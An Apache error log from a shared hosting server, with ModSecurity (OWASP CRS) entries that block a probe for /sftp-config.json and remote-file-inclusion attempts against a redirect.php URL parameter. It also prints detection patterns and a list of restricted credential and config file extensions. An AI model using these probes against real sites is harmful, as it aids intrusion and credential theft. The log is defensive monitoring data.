[Tue May 12 07:28:54.682784 2026] [security2:error] [pid 1844863:tid 1844893] [client 43.130.31.17:34710] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agK6lvaAnTZtx1_H_wzg4wAAAVg"], referer: http://tchatbooster.fr
[Tue May 12 07:29:18.392813 2026] [security2:error] [pid 1844863:tid 1844880] [client 36.37.209.184:49631] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agK6rvaAnTZtx1_H_wzhEgAAAUs"]
[Tue May 12 07:29:18.393056 2026] [security2:error] [pid 1844863:tid 1844880] [client 36.37.209.184:49631] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agK6rvaAnTZtx1_H_wzhEgAAAUs"]
[Tue May 12 07:29:18.393282 2026] [security2:error] [pid 1844863:tid 1844880] [client 36.37.209.184:49631] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "sierraimmobilier.fr"] [uri "/sftp-config.json"] [unique_id "agK6rvaAnTZtx1_H_wzhEgAAAUs"]
[Tue May 12 07:29:30.591878 2026] [security2:error] [pid 1842385:tid 1842405] [client 44.193.115.232:45115] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/watchwebcamthesex.com"] [unique_id "agK6uhs7kySIUZ3ORnJPAAAAAQ8"]
[Tue May 12 07:29:30.592254 2026] [security2:error] [pid 1842385:tid 1842405] [client 44.193.115.232:45115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/watchwebcamthesex.com"] [unique_id "agK6uhs7kySIUZ3ORnJPAAAAAQ8"]
[Tue May 12 07:29:30.592500 2026] [security2:error] [pid 1842385:tid 1842405] [client 44.193.115.232:45115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/watchwebcamthesex.com"] [unique_id "agK6uhs7kySIUZ3ORnJPAAAAAQ8"]
[Tue May 12 07:29:58.724709 2026] [security2:error] [pid 1825287:tid 1825304] [client 52.2.58.41:13832] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/videoonefreeporn.com"] [unique_id "agK61ggpmE1yW0glLdhUTwAAAMA"]
[Tue May 12 07:29:58.725106 2026] [security2:error] [pid 1825287:tid 1825304] [client 52.2.58.41:13832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/videoonefreeporn.com"] [unique_id "agK61ggpmE1yW0glLdhUTwAAAMA"]
[Tue May 12 07:29:58.725351 2026] [security2:error] [pid 1825287:tid 1825304] [client 52.2.58.41:13832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/videoonefreeporn.com"] [unique_id "agK61ggpmE1yW0glLdhUTwAAAMA"]
[Tue May 12 07:30:06.128446 2026] [security2:error] [pid 1825287:tid 1825315] [client 43.157.148.38:39456] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.k06.fr"] [uri "/"] [unique_id "agK63ggpmE1yW0glLdhUUwAAAMo"]
[Tue May 12 07:30:07.539173 2026] [security2:error] [pid 1844863:tid 1844881] [client 43.135.133.194:56134] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/gaston/"] [unique_id "agK63_aAnTZtx1_H_wzhXQAAAUw"]
[Tue May 12 07:30:19.672477 2026] [security2:error] [pid 1844863:tid 1844888] [client 3.211.181.86:34929] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://157.245.53.47 found within ARGS:url: https://157.245.53.47:8899/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK66_aAnTZtx1_H_wzhgAAAAVM"]
[Tue May 12 07:30:19.672936 2026] [security2:error] [pid 1844863:tid 1844888] [client 3.211.181.86:34929] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK66_aAnTZtx1_H_wzhgAAAAVM"]
[Tue May 12 07:30:19.673178 2026] [security2:error] [pid 1844863:tid 1844888] [client 3.211.181.86:34929] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK66_aAnTZtx1_H_wzhgAAAAVM"]
[Tue May 12 07:30:25.711524 2026] [security2:error] [pid 1842385:tid 1842409] [client 43.135.185.59:59484] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK68Rs7kySIUZ3ORnJPiQAAARI"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://lapisanperistiwa.com
[Tue May 12 07:30:55.106579 2026] [security2:error] [pid 1820198:tid 1820222] [client 49.51.183.15:35240] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/gaziniere/feed/"] [unique_id "agK7D81tk6y7yBJLpJpe1gAAAJY"]
[Tue May 12 07:31:23.788150 2026] [ssl:error] [pid 1844863:tid 1844890] (EAI 2)Name or service not known: [client 192.178.6.8:36974] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 07:31:23.788201 2026] [ssl:error] [pid 1844863:tid 1844890] AH01941: stapling_renew_response: responder error
[Tue May 12 07:31:26.659372 2026] [:error] [pid 1842385:tid 1842411] [client 191.32.30.139:37313] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 07:32:07.557265 2026] [ssl:error] [pid 1844863:tid 1844880] (EAI 2)Name or service not known: [client 37.66.59.94:9484] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 07:32:07.557311 2026] [ssl:error] [pid 1844863:tid 1844880] AH01941: stapling_renew_response: responder error
[Tue May 12 07:32:07.557459 2026] [ssl:error] [pid 1842385:tid 1842402] (EAI 2)Name or service not known: [client 37.66.59.94:9168] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 07:32:07.557492 2026] [ssl:error] [pid 1842385:tid 1842402] AH01941: stapling_renew_response: responder error
[Tue May 12 07:32:12.003719 2026] [security2:error] [pid 1825287:tid 1825321] [client 101.33.80.42:48520] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/"] [unique_id "agK7XAgpmE1yW0glLdhU4QAAANA"]
[Tue May 12 07:32:31.484513 2026] [security2:error] [pid 1820198:tid 1820221] [client 43.159.61.24:34192] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/la-saint-patrick-des-brasseurs-alpins/feed/"] [unique_id "agK7b81tk6y7yBJLpJpfjQAAAJU"]
[Tue May 12 07:33:11.362639 2026] [:error] [pid 1825179:tid 1825197] [client 110.249.201.67:23404] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 07:33:55.543025 2026] [security2:error] [pid 1844863:tid 1844886] [client 3.232.102.111:6420] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "piregwan-genesis.com"] [uri "/liens/youtube.com"] [unique_id "agK7w_aAnTZtx1_H_wzidAAAAVE"]
[Tue May 12 07:33:55.543391 2026] [security2:error] [pid 1844863:tid 1844886] [client 3.232.102.111:6420] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "piregwan-genesis.com"] [uri "/liens/youtube.com"] [unique_id "agK7w_aAnTZtx1_H_wzidAAAAVE"]
[Tue May 12 07:33:55.543622 2026] [security2:error] [pid 1844863:tid 1844886] [client 3.232.102.111:6420] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "piregwan-genesis.com"] [uri "/liens/youtube.com"] [unique_id "agK7w_aAnTZtx1_H_wzidAAAAVE"]
[Tue May 12 07:35:54.588971 2026] [ssl:error] [pid 1825179:tid 1825206] (EAI 2)Name or service not known: [client 34.141.230.59:2560] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 07:35:54.589008 2026] [ssl:error] [pid 1825179:tid 1825206] AH01941: stapling_renew_response: responder error
[Tue May 12 07:35:59.365730 2026] [security2:error] [pid 1825287:tid 1825314] [client 43.163.104.54:55314] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/11/01-conducteur-Six-miniatures-pour-sextuor-extrait.pdf"] [unique_id "agK8PwgpmE1yW0glLdhWLwAAAMk"]
[Tue May 12 07:36:22.904094 2026] [security2:error] [pid 1825287:tid 1825315] [client 52.44.148.203:13223] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/watchlivesexcam.com"] [unique_id "agK8VggpmE1yW0glLdhWTwAAAMo"]
[Tue May 12 07:36:22.904457 2026] [security2:error] [pid 1825287:tid 1825315] [client 52.44.148.203:13223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/watchlivesexcam.com"] [unique_id "agK8VggpmE1yW0glLdhWTwAAAMo"]
[Tue May 12 07:36:22.904684 2026] [security2:error] [pid 1825287:tid 1825315] [client 52.44.148.203:13223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/watchlivesexcam.com"] [unique_id "agK8VggpmE1yW0glLdhWTwAAAMo"]
[Tue May 12 07:36:27.870019 2026] [:error] [pid 1825179:tid 1825213] [client 47.128.121.243:41878] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 07:37:02.946089 2026] [authz_core:error] [pid 1842385:tid 1842395] [client 47.128.58.224:31236] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/html-api/error_log
[Tue May 12 07:37:23.416992 2026] [ssl:error] [pid 1916576:tid 1916595] (EAI 2)Name or service not known: [client 13.250.145.97:43648] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 07:37:23.417055 2026] [ssl:error] [pid 1916576:tid 1916595] AH01941: stapling_renew_response: responder error
[Tue May 12 07:38:30.713641 2026] [security2:error] [pid 1825179:tid 1825217] [client 34.194.226.74:30474] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://143.198.237.46 found within ARGS:url: https://143.198.237.46/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK81tr1yOh9TvizezjLJgAAAFM"]
[Tue May 12 07:38:30.714124 2026] [security2:error] [pid 1825179:tid 1825217] [client 34.194.226.74:30474] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK81tr1yOh9TvizezjLJgAAAFM"]
[Tue May 12 07:38:30.714401 2026] [security2:error] [pid 1825179:tid 1825217] [client 34.194.226.74:30474] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK81tr1yOh9TvizezjLJgAAAFM"]
[Tue May 12 07:38:31.274754 2026] [:error] [pid 1825287:tid 1825328] [client 17.246.23.182:35406] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 07:38:31.559365 2026] [:error] [pid 1825287:tid 1825328] [client 17.246.23.182:35406] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 07:38:39.412533 2026] [authz_core:error] [pid 1842385:tid 1842403] [client 47.128.23.249:60822] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/blocks/error_log
[Tue May 12 07:38:42.694435 2026] [security2:error] [pid 1825287:tid 1825330] [client 23.21.227.240:47634] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://167.172.7.100 found within ARGS:url: https://167.172.7.100/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK84ggpmE1yW0glLdhXOgAAANg"]
[Tue May 12 07:38:42.694955 2026] [security2:error] [pid 1825287:tid 1825330] [client 23.21.227.240:47634] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK84ggpmE1yW0glLdhXOgAAANg"]
